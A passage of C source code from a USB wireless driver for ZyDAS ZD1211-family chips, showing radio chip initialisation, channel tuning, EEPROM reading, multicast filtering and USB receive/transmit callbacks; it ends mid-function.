zyd_write32_m(sc, ZYD_CR_RADIO_PD, tmp | 1); zyd_write32_m(sc, ZYD_CR_RFCFG, 0x05); zyd_write32_m(sc, ZYD_CR_RFCFG, 0x00); zyd_write16_m(sc, ZYD_CR47, 0x1e); /* actually set the channel */ error = zyd_rfwrite(sc, rfprog[chan - 1]); if (error != 0) goto fail; zyd_write32_m(sc, ZYD_CR18, 3); fail: return (error); } /* * GCT RF methods. */ static int zyd_gct_init(struct zyd_rf *rf) { #define ZYD_GCT_INTR_REG 0x85c1 #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phyini[] = ZYD_GCT_PHY; static const uint32_t rfini[] = ZYD_GCT_RF; static const uint16_t vco[11][7] = ZYD_GCT_VCO; int i, idx = -1, error; uint16_t data; /* init RF-dependent PHY registers */ for (i = 0; i < N(phyini); i++) zyd_write16_m(sc, phyini[i].reg, phyini[i].val); /* init cgt radio */ for (i = 0; i < N(rfini); i++) { if ((error = zyd_rfwrite(sc, rfini[i])) != 0) return (error); } error = zyd_gct_mode(rf); if (error != 0) return (error); for (i = 0; i < (int)(N(vco) - 1); i++) { error = zyd_gct_set_channel_synth(rf, 1, 0); if (error != 0) goto fail; error = zyd_gct_write(rf, vco[i][0]); if (error != 0) goto fail; zyd_write16_m(sc, ZYD_GCT_INTR_REG, 0xf); zyd_read16_m(sc, ZYD_GCT_INTR_REG, &data); if ((data & 0xf) == 0) { idx = i; break; } } if (idx == -1) { error = zyd_gct_set_channel_synth(rf, 1, 1); if (error != 0) goto fail; error = zyd_gct_write(rf, 0x6662); if (error != 0) goto fail; } rf->idx = idx; zyd_write16_m(sc, ZYD_CR203, 0x6); fail: return (error); #undef N #undef ZYD_GCT_INTR_REG } static int zyd_gct_mode(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const uint32_t mode[] = { 0x25f98, 0x25f9a, 0x25f94, 0x27fd4 }; int i, error; for (i = 0; i < N(mode); i++) { if ((error = zyd_rfwrite(sc, mode[i])) != 0) break; } return (error); #undef N } static int zyd_gct_set_channel_synth(struct zyd_rf *rf, int chan, int acal) { int error, idx = chan - 1; struct zyd_softc *sc = rf->rf_sc; static uint32_t acal_synth[] = ZYD_GCT_CHANNEL_ACAL; static uint32_t std_synth[] = ZYD_GCT_CHANNEL_STD; static uint32_t div_synth[] = ZYD_GCT_CHANNEL_DIV; error = zyd_rfwrite(sc, (acal == 
1) ? acal_synth[idx] : std_synth[idx]); if (error != 0) return (error); return zyd_rfwrite(sc, div_synth[idx]); } static int zyd_gct_write(struct zyd_rf *rf, uint16_t value) { struct zyd_softc *sc = rf->rf_sc; return zyd_rfwrite(sc, 0x300000 | 0x40000 | value); } static int zyd_gct_switch_radio(struct zyd_rf *rf, int on) { int error; struct zyd_softc *sc = rf->rf_sc; error = zyd_rfwrite(sc, on ? 0x25f94 : 0x25f90); if (error != 0) return (error); zyd_write16_m(sc, ZYD_CR11, on ? 0x00 : 0x04); zyd_write16_m(sc, ZYD_CR251, on ? ((sc->sc_macrev == ZYD_ZD1211B) ? 0x7f : 0x3f) : 0x2f); fail: return (error); } static int zyd_gct_set_channel(struct zyd_rf *rf, uint8_t chan) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int error, i; struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair cmd[] = { { ZYD_CR80, 0x30 }, { ZYD_CR81, 0x30 }, { ZYD_CR79, 0x58 }, { ZYD_CR12, 0xf0 }, { ZYD_CR77, 0x1b }, { ZYD_CR78, 0x58 }, }; static const uint16_t vco[11][7] = ZYD_GCT_VCO; error = zyd_gct_set_channel_synth(rf, chan, 0); if (error != 0) goto fail; error = zyd_gct_write(rf, (rf->idx == -1) ? 0x6662 : vco[rf->idx][((chan - 1) / 2)]); if (error != 0) goto fail; error = zyd_gct_mode(rf); if (error != 0) return (error); for (i = 0; i < N(cmd); i++) zyd_write16_m(sc, cmd[i].reg, cmd[i].val); error = zyd_gct_txgain(rf, chan); if (error != 0) return (error); zyd_write16_m(sc, ZYD_CR203, 0x6); fail: return (error); #undef N } static int zyd_gct_txgain(struct zyd_rf *rf, uint8_t chan) { #define N(a) (sizeof(a) / sizeof((a)[0])) struct zyd_softc *sc = rf->rf_sc; static uint32_t txgain[] = ZYD_GCT_TXGAIN; uint8_t idx = sc->sc_pwrint[chan - 1]; if (idx >= N(txgain)) { device_printf(sc->sc_dev, "could not set TX gain (%d %#x)\n", chan, idx); return 0; } return zyd_rfwrite(sc, 0x700000 | txgain[idx]); #undef N } /* * Maxim2 RF methods. */ static int zyd_maxim2_init(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phyini[] = ZYD_MAXIM2_PHY; static const uint32_t rfini[] = ZYD_MAXIM2_RF; uint16_t tmp; int i, error; /* init RF-dependent PHY registers */ for (i = 0; i < N(phyini); i++) zyd_write16_m(sc, phyini[i].reg, phyini[i].val); zyd_read16_m(sc, ZYD_CR203, &tmp); zyd_write16_m(sc, ZYD_CR203, tmp & ~(1 << 4)); /* init maxim2 radio */ for (i = 0; i < N(rfini); i++) { if ((error = zyd_rfwrite(sc, rfini[i])) != 0) return (error); } zyd_read16_m(sc, ZYD_CR203, &tmp); zyd_write16_m(sc, ZYD_CR203, tmp | (1 << 4)); fail: return (error); #undef N } static int zyd_maxim2_switch_radio(struct zyd_rf *rf, int on) { /* vendor driver does nothing for this RF chip */ return (0); } static int zyd_maxim2_set_channel(struct zyd_rf *rf, uint8_t chan) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phyini[] = ZYD_MAXIM2_PHY; static const uint32_t rfini[] = ZYD_MAXIM2_RF; static const struct { uint32_t r1, r2; } rfprog[] = ZYD_MAXIM2_CHANTABLE; uint16_t tmp; int i, error; /* * Do the same as we do when initializing it, except for the channel * values coming from the two channel tables. 
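 * Only the first two RF writes are channel dependent; the rest of the init sequence is replayed unchanged.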
*/ /* init RF-dependent PHY registers */ for (i = 0; i < N(phyini); i++) zyd_write16_m(sc, phyini[i].reg, phyini[i].val); zyd_read16_m(sc, ZYD_CR203, &tmp); zyd_write16_m(sc, ZYD_CR203, tmp & ~(1 << 4)); /* first two values taken from the chantables */ error = zyd_rfwrite(sc, rfprog[chan - 1].r1); if (error != 0) goto fail; error = zyd_rfwrite(sc, rfprog[chan - 1].r2); if (error != 0) goto fail; /* init maxim2 radio - skipping the two first values */ for (i = 2; i < N(rfini); i++) { if ((error = zyd_rfwrite(sc, rfini[i])) != 0) return (error); } zyd_read16_m(sc, ZYD_CR203, &tmp); zyd_write16_m(sc, ZYD_CR203, tmp | (1 << 4)); fail: return (error); #undef N } static int zyd_rf_attach(struct zyd_softc *sc, uint8_t type) { struct zyd_rf *rf = &sc->sc_rf; rf->rf_sc = sc; rf->update_pwr = 1; switch (type) { case ZYD_RF_RFMD: rf->init = zyd_rfmd_init; rf->switch_radio = zyd_rfmd_switch_radio; rf->set_channel = zyd_rfmd_set_channel; rf->width = 24; /* 24-bit RF values */ break; case ZYD_RF_AL2230: case ZYD_RF_AL2230S: if (sc->sc_macrev == ZYD_ZD1211B) { rf->init = zyd_al2230_init_b; rf->set_channel = zyd_al2230_set_channel_b; } else { rf->init = zyd_al2230_init; rf->set_channel = zyd_al2230_set_channel; } rf->switch_radio = zyd_al2230_switch_radio; rf->bandedge6 = zyd_al2230_bandedge6; rf->width = 24; /* 24-bit RF values */ break; case ZYD_RF_AL7230B: rf->init = zyd_al7230B_init; rf->switch_radio = zyd_al7230B_switch_radio; rf->set_channel = zyd_al7230B_set_channel; rf->width = 24; /* 24-bit RF values */ break; case ZYD_RF_AL2210: rf->init = zyd_al2210_init; rf->switch_radio = zyd_al2210_switch_radio; rf->set_channel = zyd_al2210_set_channel; rf->width = 24; /* 24-bit RF values */ break; case ZYD_RF_MAXIM_NEW: case ZYD_RF_GCT: rf->init = zyd_gct_init; rf->switch_radio = zyd_gct_switch_radio; rf->set_channel = zyd_gct_set_channel; rf->width = 24; /* 24-bit RF values */ rf->update_pwr = 0; break; case ZYD_RF_MAXIM_NEW2: rf->init = zyd_maxim2_init; rf->switch_radio = zyd_maxim2_switch_radio; rf->set_channel = zyd_maxim2_set_channel; rf->width = 18; /* 18-bit RF values */ break; default: device_printf(sc->sc_dev, "sorry, radio \"%s\" is not supported yet\n", zyd_rf_name(type)); return (EINVAL); } return (0); } static const char * zyd_rf_name(uint8_t type) { static const char * const zyd_rfs[] = { "unknown", "unknown", "UW2451", "UCHIP", "AL2230", "AL7230B", "THETA", "AL2210", "MAXIM_NEW", "GCT", "AL2230S", "RALINK", "INTERSIL", "RFMD", "MAXIM_NEW2", "PHILIPS" }; return zyd_rfs[(type > 15) ? 0 : type]; } static int zyd_hw_init(struct zyd_softc *sc) { int error; const struct zyd_phy_pair *phyp; struct zyd_rf *rf = &sc->sc_rf; uint16_t val; /* specify that the plug and play is finished */ zyd_write32_m(sc, ZYD_MAC_AFTER_PNP, 1); zyd_read16_m(sc, ZYD_FIRMWARE_BASE_ADDR, &sc->sc_fwbase); DPRINTF(sc, ZYD_DEBUG_FW, "firmware base address=0x%04x\n", sc->sc_fwbase); /* retrieve firmware revision number */ zyd_read16_m(sc, sc->sc_fwbase + ZYD_FW_FIRMWARE_REV, &sc->sc_fwrev); zyd_write32_m(sc, ZYD_CR_GPI_EN, 0); zyd_write32_m(sc, ZYD_MAC_CONT_WIN_LIMIT, 0x7f043f); /* set mandatory rates - XXX assumes 802.11b/g */ zyd_write32_m(sc, ZYD_MAC_MAN_RATE, 0x150f); /* disable interrupts */ zyd_write32_m(sc, ZYD_CR_INTERRUPT, 0); if ((error = zyd_read_pod(sc)) != 0) { device_printf(sc->sc_dev, "could not read EEPROM\n"); goto fail; } /* PHY init (resetting) */ error = zyd_lock_phy(sc); if (error != 0) goto fail; phyp = (sc->sc_macrev == ZYD_ZD1211B) ? 
zyd_def_phyB : zyd_def_phy; for (; phyp->reg != 0; phyp++) zyd_write16_m(sc, phyp->reg, phyp->val); if (sc->sc_macrev == ZYD_ZD1211 && sc->sc_fix_cr157 != 0) { zyd_read16_m(sc, ZYD_EEPROM_PHY_REG, &val); zyd_write32_m(sc, ZYD_CR157, val >> 8); } error = zyd_unlock_phy(sc); if (error != 0) goto fail; /* HMAC init */ zyd_write32_m(sc, ZYD_MAC_ACK_EXT, 0x00000020); zyd_write32_m(sc, ZYD_CR_ADDA_MBIAS_WT, 0x30000808); zyd_write32_m(sc, ZYD_MAC_SNIFFER, 0x00000000); zyd_write32_m(sc, ZYD_MAC_RXFILTER, 0x00000000); zyd_write32_m(sc, ZYD_MAC_GHTBL, 0x00000000); zyd_write32_m(sc, ZYD_MAC_GHTBH, 0x80000000); zyd_write32_m(sc, ZYD_MAC_MISC, 0x000000a4); zyd_write32_m(sc, ZYD_CR_ADDA_PWR_DWN, 0x0000007f); zyd_write32_m(sc, ZYD_MAC_BCNCFG, 0x00f00401); zyd_write32_m(sc, ZYD_MAC_PHY_DELAY2, 0x00000000); zyd_write32_m(sc, ZYD_MAC_ACK_EXT, 0x00000080); zyd_write32_m(sc, ZYD_CR_ADDA_PWR_DWN, 0x00000000); zyd_write32_m(sc, ZYD_MAC_SIFS_ACK_TIME, 0x00000100); zyd_write32_m(sc, ZYD_CR_RX_PE_DELAY, 0x00000070); zyd_write32_m(sc, ZYD_CR_PS_CTRL, 0x10000000); zyd_write32_m(sc, ZYD_MAC_RTSCTSRATE, 0x02030203); zyd_write32_m(sc, ZYD_MAC_AFTER_PNP, 1); zyd_write32_m(sc, ZYD_MAC_BACKOFF_PROTECT, 0x00000114); zyd_write32_m(sc, ZYD_MAC_DIFS_EIFS_SIFS, 0x0a47c032); zyd_write32_m(sc, ZYD_MAC_CAM_MODE, 0x3); if (sc->sc_macrev == ZYD_ZD1211) { zyd_write32_m(sc, ZYD_MAC_RETRY, 0x00000002); zyd_write32_m(sc, ZYD_MAC_RX_THRESHOLD, 0x000c0640); } else { zyd_write32_m(sc, ZYD_MACB_MAX_RETRY, 0x02020202); zyd_write32_m(sc, ZYD_MACB_TXPWR_CTL4, 0x007f003f); zyd_write32_m(sc, ZYD_MACB_TXPWR_CTL3, 0x007f003f); zyd_write32_m(sc, ZYD_MACB_TXPWR_CTL2, 0x003f001f); zyd_write32_m(sc, ZYD_MACB_TXPWR_CTL1, 0x001f000f); zyd_write32_m(sc, ZYD_MACB_AIFS_CTL1, 0x00280028); zyd_write32_m(sc, ZYD_MACB_AIFS_CTL2, 0x008C003C); zyd_write32_m(sc, ZYD_MACB_TXOP, 0x01800824); zyd_write32_m(sc, ZYD_MAC_RX_THRESHOLD, 0x000c0eff); } /* init beacon interval to 100ms */ if ((error = zyd_set_beacon_interval(sc, 100)) != 0) goto fail; if ((error = zyd_rf_attach(sc, sc->sc_rfrev)) != 0) { device_printf(sc->sc_dev, "could not attach RF, rev 0x%x\n", sc->sc_rfrev); goto fail; } /* RF chip init */ error = zyd_lock_phy(sc); if (error != 0) goto fail; error = (*rf->init)(rf); if (error != 0) { device_printf(sc->sc_dev, "radio initialization failed, error %d\n", error); goto fail; } error = zyd_unlock_phy(sc); if (error != 0) goto fail; if ((error = zyd_read_eeprom(sc)) != 0) { device_printf(sc->sc_dev, "could not read EEPROM\n"); goto fail; } fail: return (error); } static int zyd_read_pod(struct zyd_softc *sc) { int error; uint32_t tmp; zyd_read32_m(sc, ZYD_EEPROM_POD, &tmp); sc->sc_rfrev = tmp & 0x0f; sc->sc_ledtype = (tmp >> 4) & 0x01; sc->sc_al2230s = (tmp >> 7) & 0x01; sc->sc_cckgain = (tmp >> 8) & 0x01; sc->sc_fix_cr157 = (tmp >> 13) & 0x01; sc->sc_parev = (tmp >> 16) & 0x0f; sc->sc_bandedge6 = (tmp >> 21) & 0x01; sc->sc_newphy = (tmp >> 31) & 0x01; sc->sc_txled = ((tmp & (1 << 24)) && (tmp & (1 << 29))) ? 
0 : 1; fail: return (error); } static int zyd_read_eeprom(struct zyd_softc *sc) { uint16_t val; int error, i; /* read Tx power calibration tables */ for (i = 0; i < 7; i++) { zyd_read16_m(sc, ZYD_EEPROM_PWR_CAL + i, &val); sc->sc_pwrcal[i * 2] = val >> 8; sc->sc_pwrcal[i * 2 + 1] = val & 0xff; zyd_read16_m(sc, ZYD_EEPROM_PWR_INT + i, &val); sc->sc_pwrint[i * 2] = val >> 8; sc->sc_pwrint[i * 2 + 1] = val & 0xff; zyd_read16_m(sc, ZYD_EEPROM_36M_CAL + i, &val); sc->sc_ofdm36_cal[i * 2] = val >> 8; sc->sc_ofdm36_cal[i * 2 + 1] = val & 0xff; zyd_read16_m(sc, ZYD_EEPROM_48M_CAL + i, &val); sc->sc_ofdm48_cal[i * 2] = val >> 8; sc->sc_ofdm48_cal[i * 2 + 1] = val & 0xff; zyd_read16_m(sc, ZYD_EEPROM_54M_CAL + i, &val); sc->sc_ofdm54_cal[i * 2] = val >> 8; sc->sc_ofdm54_cal[i * 2 + 1] = val & 0xff; } fail: return (error); } static int zyd_get_macaddr(struct zyd_softc *sc) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = ZYD_READFWDATAREQ; USETW(req.wValue, ZYD_EEPROM_MAC_ADDR_P1); USETW(req.wIndex, 0); USETW(req.wLength, IEEE80211_ADDR_LEN); error = zyd_do_request(sc, &req, sc->sc_bssid); if (error != 0) { device_printf(sc->sc_dev, "could not read EEPROM: %s\n", usbd_errstr(error)); } return (error); } static int zyd_set_macaddr(struct zyd_softc *sc, const uint8_t *addr) { int error; uint32_t tmp; tmp = addr[3] << 24 | addr[2] << 16 | addr[1] << 8 | addr[0]; zyd_write32_m(sc, ZYD_MAC_MACADRL, tmp); tmp = addr[5] << 8 | addr[4]; zyd_write32_m(sc, ZYD_MAC_MACADRH, tmp); fail: return (error); } static int zyd_set_bssid(struct zyd_softc *sc, const uint8_t *addr) { int error; uint32_t tmp; tmp = addr[3] << 24 | addr[2] << 16 | addr[1] << 8 | addr[0]; zyd_write32_m(sc, ZYD_MAC_BSSADRL, tmp); tmp = addr[5] << 8 | addr[4]; zyd_write32_m(sc, ZYD_MAC_BSSADRH, tmp); fail: return (error); } static int zyd_switch_radio(struct zyd_softc *sc, int on) { struct zyd_rf *rf = &sc->sc_rf; int error; error = zyd_lock_phy(sc); if (error != 0) goto fail; error = (*rf->switch_radio)(rf, on); if (error != 0) goto fail; error = zyd_unlock_phy(sc); fail: return (error); } static int zyd_set_led(struct zyd_softc *sc, int which, int on) { int error; uint32_t tmp; zyd_read32_m(sc, ZYD_MAC_TX_PE_CONTROL, &tmp); tmp &= ~which; if (on) tmp |= which; zyd_write32_m(sc, ZYD_MAC_TX_PE_CONTROL, tmp); fail: return (error); } static void zyd_set_multi(struct zyd_softc *sc) { int error; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ifmultiaddr *ifma; uint32_t low, high; uint8_t v; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; low = 0x00000000; high = 0x80000000; if (ic->ic_opmode == IEEE80211_M_MONITOR || (ifp->if_flags & (IFF_ALLMULTI | IFF_PROMISC))) { low = 0xffffffff; high = 0xffffffff; } else { if_maddr_rlock(ifp); TAILQ_FOREACH(ifma, &ifp->if_multiaddrs, ifma_link) { if (ifma->ifma_addr->sa_family != AF_LINK) continue; v = ((uint8_t *)LLADDR((struct sockaddr_dl *) ifma->ifma_addr))[5] >> 2; if (v < 32) low |= 1 << v; else high |= 1 << (v - 32); } if_maddr_runlock(ifp); } /* reprogram multicast global hash table */ zyd_write32_m(sc, ZYD_MAC_GHTBL, low); zyd_write32_m(sc, ZYD_MAC_GHTBH, high); fail: if (error != 0) device_printf(sc->sc_dev, "could not set multicast hash table\n"); } static void zyd_update_mcast(struct ifnet *ifp) { struct zyd_softc *sc = ifp->if_softc; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; ZYD_LOCK(sc); zyd_set_multi(sc); ZYD_UNLOCK(sc); } static int zyd_set_rxfilter(struct zyd_softc *sc) { struct 
ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t rxfilter; switch (ic->ic_opmode) { case IEEE80211_M_STA: rxfilter = ZYD_FILTER_BSS; break; case IEEE80211_M_IBSS: case IEEE80211_M_HOSTAP: rxfilter = ZYD_FILTER_HOSTAP; break; case IEEE80211_M_MONITOR: rxfilter = ZYD_FILTER_MONITOR; break; default: /* should not get there */ return (EINVAL); } return zyd_write32(sc, ZYD_MAC_RXFILTER, rxfilter); } static void zyd_set_chan(struct zyd_softc *sc, struct ieee80211_channel *c) { int error; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct zyd_rf *rf = &sc->sc_rf; uint32_t tmp; int chan; chan = ieee80211_chan2ieee(ic, c); if (chan == 0 || chan == IEEE80211_CHAN_ANY) { /* XXX should NEVER happen */ device_printf(sc->sc_dev, "%s: invalid channel %x\n", __func__, chan); return; } error = zyd_lock_phy(sc); if (error != 0) goto fail; error = (*rf->set_channel)(rf, chan); if (error != 0) goto fail; if (rf->update_pwr) { /* update Tx power */ zyd_write16_m(sc, ZYD_CR31, sc->sc_pwrint[chan - 1]); if (sc->sc_macrev == ZYD_ZD1211B) { zyd_write16_m(sc, ZYD_CR67, sc->sc_ofdm36_cal[chan - 1]); zyd_write16_m(sc, ZYD_CR66, sc->sc_ofdm48_cal[chan - 1]); zyd_write16_m(sc, ZYD_CR65, sc->sc_ofdm54_cal[chan - 1]); zyd_write16_m(sc, ZYD_CR68, sc->sc_pwrcal[chan - 1]); zyd_write16_m(sc, ZYD_CR69, 0x28); zyd_write16_m(sc, ZYD_CR69, 0x2a); } } if (sc->sc_cckgain) { /* set CCK baseband gain from EEPROM */ if (zyd_read32(sc, ZYD_EEPROM_PHY_REG, &tmp) == 0) zyd_write16_m(sc, ZYD_CR47, tmp & 0xff); } if (sc->sc_bandedge6 && rf->bandedge6 != NULL) { error = (*rf->bandedge6)(rf, c); if (error != 0) goto fail; } zyd_write32_m(sc, ZYD_CR_CONFIG_PHILIPS, 0); error = zyd_unlock_phy(sc); if (error != 0) goto fail; sc->sc_rxtap.wr_chan_freq = sc->sc_txtap.wt_chan_freq = htole16(c->ic_freq); sc->sc_rxtap.wr_chan_flags = sc->sc_txtap.wt_chan_flags = htole16(c->ic_flags); fail: return; } static int zyd_set_beacon_interval(struct zyd_softc *sc, int bintval) { int error; uint32_t val; zyd_read32_m(sc, ZYD_CR_ATIM_WND_PERIOD, &val); sc->sc_atim_wnd = val; zyd_read32_m(sc, ZYD_CR_PRE_TBTT, &val); sc->sc_pre_tbtt = val; sc->sc_bcn_int = bintval; if (sc->sc_bcn_int <= 5) sc->sc_bcn_int = 5; if (sc->sc_pre_tbtt < 4 || sc->sc_pre_tbtt >= sc->sc_bcn_int) sc->sc_pre_tbtt = sc->sc_bcn_int - 1; if (sc->sc_atim_wnd >= sc->sc_pre_tbtt) sc->sc_atim_wnd = sc->sc_pre_tbtt - 1; zyd_write32_m(sc, ZYD_CR_ATIM_WND_PERIOD, sc->sc_atim_wnd); zyd_write32_m(sc, ZYD_CR_PRE_TBTT, sc->sc_pre_tbtt); zyd_write32_m(sc, ZYD_CR_BCN_INTERVAL, sc->sc_bcn_int); fail: return (error); } static void zyd_rx_data(struct usb_xfer *xfer, int offset, uint16_t len) { struct zyd_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct zyd_plcphdr plcp; struct zyd_rx_stat stat; struct usb_page_cache *pc; struct mbuf *m; int rlen, rssi; if (len < ZYD_MIN_FRAGSZ) { DPRINTF(sc, ZYD_DEBUG_RECV, "%s: frame too short (length=%d)\n", device_get_nameunit(sc->sc_dev), len); ifp->if_ierrors++; return; } pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_out(pc, offset, &plcp, sizeof(plcp)); usbd_copy_out(pc, offset + len - sizeof(stat), &stat, sizeof(stat)); if (stat.flags & ZYD_RX_ERROR) { DPRINTF(sc, ZYD_DEBUG_RECV, "%s: RX status indicated error (%x)\n", device_get_nameunit(sc->sc_dev), stat.flags); ifp->if_ierrors++; return; } /* compute actual frame length */ rlen = len - sizeof(struct zyd_plcphdr) - sizeof(struct zyd_rx_stat) - IEEE80211_CRC_LEN; /* allocate a mbuf to store the 
frame */ if (rlen > (int)MCLBYTES) { DPRINTF(sc, ZYD_DEBUG_RECV, "%s: frame too long (length=%d)\n", device_get_nameunit(sc->sc_dev), rlen); ifp->if_ierrors++; return; } else if (rlen > (int)MHLEN) m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); else m = m_gethdr(M_NOWAIT, MT_DATA); if (m == NULL) { DPRINTF(sc, ZYD_DEBUG_RECV, "%s: could not allocate rx mbuf\n", device_get_nameunit(sc->sc_dev)); ifp->if_ierrors++; return; } m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = rlen; usbd_copy_out(pc, offset + sizeof(plcp), mtod(m, uint8_t *), rlen); if (ieee80211_radiotap_active(ic)) { struct zyd_rx_radiotap_header *tap = &sc->sc_rxtap; tap->wr_flags = 0; if (stat.flags & (ZYD_RX_BADCRC16 | ZYD_RX_BADCRC32)) tap->wr_flags |= IEEE80211_RADIOTAP_F_BADFCS; /* XXX toss, no way to express errors */ if (stat.flags & ZYD_RX_DECRYPTERR) tap->wr_flags |= IEEE80211_RADIOTAP_F_BADFCS; tap->wr_rate = ieee80211_plcp2rate(plcp.signal, (stat.flags & ZYD_RX_OFDM) ? IEEE80211_T_OFDM : IEEE80211_T_CCK); tap->wr_antsignal = stat.rssi + -95; tap->wr_antnoise = -95; /* XXX */ } rssi = (stat.rssi > 63) ? 127 : 2 * stat.rssi; sc->sc_rx_data[sc->sc_rx_count].rssi = rssi; sc->sc_rx_data[sc->sc_rx_count].m = m; sc->sc_rx_count++; } static void zyd_bulk_read_callback(struct usb_xfer *xfer, usb_error_t error) { struct zyd_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_node *ni; struct zyd_rx_desc desc; struct mbuf *m; struct usb_page_cache *pc; uint32_t offset; uint8_t rssi; int8_t nf; int i; int actlen; usbd_xfer_status(xfer, &actlen, NULL, NULL, NULL); sc->sc_rx_count = 0; switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_out(pc, actlen - sizeof(desc), &desc, sizeof(desc)); offset = 0; if (UGETW(desc.tag) == ZYD_TAG_MULTIFRAME) { DPRINTF(sc, ZYD_DEBUG_RECV, "%s: received multi-frame transfer\n", __func__); for (i = 0; i < ZYD_MAX_RXFRAMECNT; i++) { uint16_t len16 = UGETW(desc.len[i]); if (len16 == 0 || len16 > actlen) break; zyd_rx_data(xfer, offset, len16); /* next frame is aligned on a 32-bit boundary */ len16 = (len16 + 3) & ~3; offset += len16; if (len16 > actlen) break; actlen -= len16; } } else { DPRINTF(sc, ZYD_DEBUG_RECV, "%s: received single-frame transfer\n", __func__); zyd_rx_data(xfer, 0, actlen); } /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: usbd_xfer_set_frame_len(xfer, 0, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); /* * At the end of a USB callback it is always safe to unlock * the private mutex of a device! That is why we do the * "ieee80211_input" here, and not some lines up! */ ZYD_UNLOCK(sc); for (i = 0; i < sc->sc_rx_count; i++) { rssi = sc->sc_rx_data[i].rssi; m = sc->sc_rx_data[i].m; sc->sc_rx_data[i].m = NULL; nf = -95; /* XXX */ ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (ni != NULL) { (void)ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else (void)ieee80211_input_all(ic, m, rssi, nf); } if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_IS_EMPTY(&ifp->if_snd)) zyd_start(ifp); ZYD_LOCK(sc); break; default: /* Error */ DPRINTF(sc, ZYD_DEBUG_ANY, "frame error: %s\n", usbd_errstr(error)); if (error != USB_ERR_CANCELLED) { /* try to clear stall first */ usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static uint8_t zyd_plcp_signal(struct zyd_softc *sc, int rate) { switch (rate) { /* OFDM rates (cf IEEE Std 802.11a-1999, pp. 
14 Table 80) */ case 12: return (0xb); case 18: return (0xf); case 24: return (0xa); case 36: return (0xe); case 48: return (0x9); case 72: return (0xd); case 96: return (0x8); case 108: return (0xc); /* CCK rates (NB: not IEEE std, device-specific) */ case 2: return (0x0); case 4: return (0x1); case 11: return (0x2); case 22: return (0x3); } device_printf(sc->sc_dev, "unsupported rate %d\n", rate); return (0x0); } static void zyd_bulk_write_callback(struct usb_xfer *xfer, usb_error_t error) { struct zyd_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211vap *vap; struct zyd_tx_data *data; struct mbuf *m; struct usb_page_cache *pc; int actlen; usbd_xfer_status(xfer, &actlen, NULL, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: DPRINTF(sc, ZYD_DEBUG_ANY, "transfer complete, %u bytes\n", actlen); /* free resources */ data = usbd_xfer_get_priv(xfer); zyd_tx_free(data, 0); usbd_xfer_set_priv(xfer, NULL); ifp->if_opackets++; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&sc->tx_q); if (data) { STAILQ_REMOVE_HEAD(&sc->tx_q, next); m = data->m; if (m->m_pkthdr.len > (int)ZYD_MAX_TXBUFSZ) { DPRINTF(sc, ZYD_DEBUG_ANY, "data overflow, %u bytes\n", m->m_pkthdr.len); m->m_pkthdr.len = ZYD_MAX_TXBUFSZ; } pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_in(pc, 0, &data->desc, ZYD_TX_DESC_SIZE); usbd_m_copy_in(pc, ZYD_TX_DESC_SIZE, m, 0, m->m_pkthdr.len); vap = data->ni->ni_vap; if (ieee80211_radiotap_active_vap(vap)) { struct zyd_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = data->rate; ieee80211_radiotap_tx(vap, m); } usbd_xfer_set_frame_len(xfer, 0, ZYD_TX_DESC_SIZE + m->m_pkthdr.len); usbd_xfer_set_priv(xfer, data); usbd_transfer_submit(xfer); } ZYD_UNLOCK(sc); zyd_start(ifp); ZYD_LOCK(sc); break; default: /* Error */ DPRINTF(sc, ZYD_DEBUG_ANY, "transfer error, %s\n", usbd_errstr(error)); ifp->if_oerrors++; data = usbd_xfer_get_priv(xfer); usbd_xfer_set_priv(xfer, NULL); if (data != NULL) zyd_tx_free(data, error); if (error != USB_ERR_CANCELLED) { if (error == USB_ERR_TIMEOUT) device_printf(sc->sc_dev, "device timeout\n"); /* * Try to clear stall first, also if other * errors occur, hence clearing stall * introduces a 50 ms delay: */ usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static int zyd_tx_start(struct zyd_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct zyd_tx_desc *desc; struct zyd_tx_data *data; struct ieee80211_frame *wh; const struct ieee80211_txparam 